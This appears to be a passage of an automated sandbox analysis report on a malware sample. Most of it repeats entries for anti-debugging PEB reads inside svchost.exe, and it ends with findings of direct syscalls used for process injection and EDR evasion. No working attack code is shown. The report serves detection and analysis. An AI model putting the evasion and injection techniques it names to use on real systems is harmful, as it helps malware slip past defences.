Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40535 mov eax, dword ptr fs:[00000030h]	2_2_03B40535
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E53E mov eax, dword ptr fs:[00000030h]	2_2_03B5E53E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6500 mov eax, dword ptr fs:[00000030h]	2_2_03BC6500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04500 mov eax, dword ptr fs:[00000030h]	2_2_03C04500
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6656A mov eax, dword ptr fs:[00000030h]	2_2_03B6656A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]	2_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38550 mov eax, dword ptr fs:[00000030h]	2_2_03B38550
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B644B0 mov ecx, dword ptr fs:[00000030h]	2_2_03B644B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBA4B0 mov eax, dword ptr fs:[00000030h]	2_2_03BBA4B0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B364AB mov eax, dword ptr fs:[00000030h]	2_2_03B364AB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA49A mov eax, dword ptr fs:[00000030h]	2_2_03BEA49A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B304E5 mov ecx, dword ptr fs:[00000030h]	2_2_03B304E5
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6A430 mov eax, dword ptr fs:[00000030h]	2_2_03B6A430
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2E420 mov eax, dword ptr fs:[00000030h]	2_2_03B2E420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2C427 mov eax, dword ptr fs:[00000030h]	2_2_03B2C427
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB6420 mov eax, dword ptr fs:[00000030h]	2_2_03BB6420
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68402 mov eax, dword ptr fs:[00000030h]	2_2_03B68402
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5A470 mov eax, dword ptr fs:[00000030h]	2_2_03B5A470
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC460 mov ecx, dword ptr fs:[00000030h]	2_2_03BBC460
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BEA456 mov eax, dword ptr fs:[00000030h]	2_2_03BEA456
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2645D mov eax, dword ptr fs:[00000030h]	2_2_03B2645D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5245A mov eax, dword ptr fs:[00000030h]	2_2_03B5245A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6E443 mov eax, dword ptr fs:[00000030h]	2_2_03B6E443
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]	2_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40BBE mov eax, dword ptr fs:[00000030h]	2_2_03B40BBE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4BB0 mov eax, dword ptr fs:[00000030h]	2_2_03BE4BB0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38BF0 mov eax, dword ptr fs:[00000030h]	2_2_03B38BF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EBFC mov eax, dword ptr fs:[00000030h]	2_2_03B5EBFC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBCBF0 mov eax, dword ptr fs:[00000030h]	2_2_03BBCBF0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEBD0 mov eax, dword ptr fs:[00000030h]	2_2_03BDEBD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B50BCB mov eax, dword ptr fs:[00000030h]	2_2_03B50BCB
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30BCD mov eax, dword ptr fs:[00000030h]	2_2_03B30BCD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EB20 mov eax, dword ptr fs:[00000030h]	2_2_03B5EB20
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BF8B28 mov eax, dword ptr fs:[00000030h]	2_2_03BF8B28
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C02B57 mov eax, dword ptr fs:[00000030h]	2_2_03C02B57
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAEB1D mov eax, dword ptr fs:[00000030h]	2_2_03BAEB1D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04B00 mov eax, dword ptr fs:[00000030h]	2_2_03C04B00
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B2CB7E mov eax, dword ptr fs:[00000030h]	2_2_03B2CB7E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28B50 mov eax, dword ptr fs:[00000030h]	2_2_03B28B50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEB50 mov eax, dword ptr fs:[00000030h]	2_2_03BDEB50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BE4B4B mov eax, dword ptr fs:[00000030h]	2_2_03BE4B4B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC6B40 mov eax, dword ptr fs:[00000030h]	2_2_03BC6B40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFAB40 mov eax, dword ptr fs:[00000030h]	2_2_03BFAB40
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD8B42 mov eax, dword ptr fs:[00000030h]	2_2_03BD8B42
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B38AA0 mov eax, dword ptr fs:[00000030h]	2_2_03B38AA0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86AA4 mov eax, dword ptr fs:[00000030h]	2_2_03B86AA4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B68A90 mov edx, dword ptr fs:[00000030h]	2_2_03B68A90
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3EA80 mov eax, dword ptr fs:[00000030h]	2_2_03B3EA80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04A80 mov eax, dword ptr fs:[00000030h]	2_2_03C04A80
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6AAEE mov eax, dword ptr fs:[00000030h]	2_2_03B6AAEE
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B30AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B64AD0 mov eax, dword ptr fs:[00000030h]	2_2_03B64AD0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B86ACC mov eax, dword ptr fs:[00000030h]	2_2_03B86ACC
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]	2_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B54A35 mov eax, dword ptr fs:[00000030h]	2_2_03B54A35
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA38 mov eax, dword ptr fs:[00000030h]	2_2_03B6CA38
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA24 mov eax, dword ptr fs:[00000030h]	2_2_03B6CA24
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5EA2E mov eax, dword ptr fs:[00000030h]	2_2_03B5EA2E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBCA11 mov eax, dword ptr fs:[00000030h]	2_2_03BBCA11
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]	2_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BACA72 mov eax, dword ptr fs:[00000030h]	2_2_03BACA72
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6CA6F mov eax, dword ptr fs:[00000030h]	2_2_03B6CA6F
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BDEA60 mov eax, dword ptr fs:[00000030h]	2_2_03BDEA60
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B36A50 mov eax, dword ptr fs:[00000030h]	2_2_03B36A50
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]	2_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B40A5B mov eax, dword ptr fs:[00000030h]	2_2_03B40A5B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov esi, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB89B3 mov eax, dword ptr fs:[00000030h]	2_2_03BB89B3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B429A0 mov eax, dword ptr fs:[00000030h]	2_2_03B429A0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]	2_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B309AD mov eax, dword ptr fs:[00000030h]	2_2_03B309AD
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]	2_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B629F9 mov eax, dword ptr fs:[00000030h]	2_2_03B629F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBE9E0 mov eax, dword ptr fs:[00000030h]	2_2_03BBE9E0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B3A9D0 mov eax, dword ptr fs:[00000030h]	2_2_03B3A9D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B649D0 mov eax, dword ptr fs:[00000030h]	2_2_03B649D0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA9D3 mov eax, dword ptr fs:[00000030h]	2_2_03BFA9D3
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC69C0 mov eax, dword ptr fs:[00000030h]	2_2_03BC69C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C04940 mov eax, dword ptr fs:[00000030h]	2_2_03C04940
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB892A mov eax, dword ptr fs:[00000030h]	2_2_03BB892A
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BC892B mov eax, dword ptr fs:[00000030h]	2_2_03BC892B
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC912 mov eax, dword ptr fs:[00000030h]	2_2_03BBC912
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]	2_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B28918 mov eax, dword ptr fs:[00000030h]	2_2_03B28918
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]	2_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BAE908 mov eax, dword ptr fs:[00000030h]	2_2_03BAE908
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]	2_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BD4978 mov eax, dword ptr fs:[00000030h]	2_2_03BD4978
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC97C mov eax, dword ptr fs:[00000030h]	2_2_03BBC97C
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B56962 mov eax, dword ptr fs:[00000030h]	2_2_03B56962
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov edx, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B7096E mov eax, dword ptr fs:[00000030h]	2_2_03B7096E
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BB0946 mov eax, dword ptr fs:[00000030h]	2_2_03BB0946
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03C008C0 mov eax, dword ptr fs:[00000030h]	2_2_03C008C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BBC89D mov eax, dword ptr fs:[00000030h]	2_2_03BBC89D
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B30887 mov eax, dword ptr fs:[00000030h]	2_2_03B30887
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B6C8F9 mov eax, dword ptr fs:[00000030h]	2_2_03B6C8F9
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03BFA8E4 mov eax, dword ptr fs:[00000030h]	2_2_03BFA8E4
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B5E8C0 mov eax, dword ptr fs:[00000030h]	2_2_03B5E8C0
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov ecx, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835
Source: C:\Windows\SysWOW64\svchost.exe	Code function: 2_2_03B52835 mov eax, dword ptr fs:[00000030h]	2_2_03B52835

Source: C:\Users\user\Desktop\25IvlOVEB1.exe

Code function: 0_2_000C80A9 GetTokenInformation,GetLastError,GetProcessHeap,HeapAlloc,GetTokenInformation,

0_2_000C80A9

Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0009A124 SetUnhandledExceptionFilter,		0_2_0009A124
Source: C:\Users\user\Desktop\25IvlOVEB1.exe	Code function: 0_2_0009A155 SetUnhandledExceptionFilter,UnhandledExceptionFilter,		0_2_0009A155

HIPS / PFW / Operating System Protection Evasion

Found direct / indirect Syscall (likely to bypass EDR)

Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtResumeThread: Direct from: 0x773836AC	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtMapViewOfSection: Direct from: 0x77382D1C	Jump to behavior
Source: C:\Program Files (x86)\fjheILaaZQgGTPcuIRbEsWdvcFDjDVxxIcigXaQHnPXMdbqKwChPXOTUnZvttYNWOlASaIaNlNmSkGt\CsyVZPSRWzlUG.exe	NtWriteVirtualMemory: Direct from: 0x77382E3C	Jump to behavior
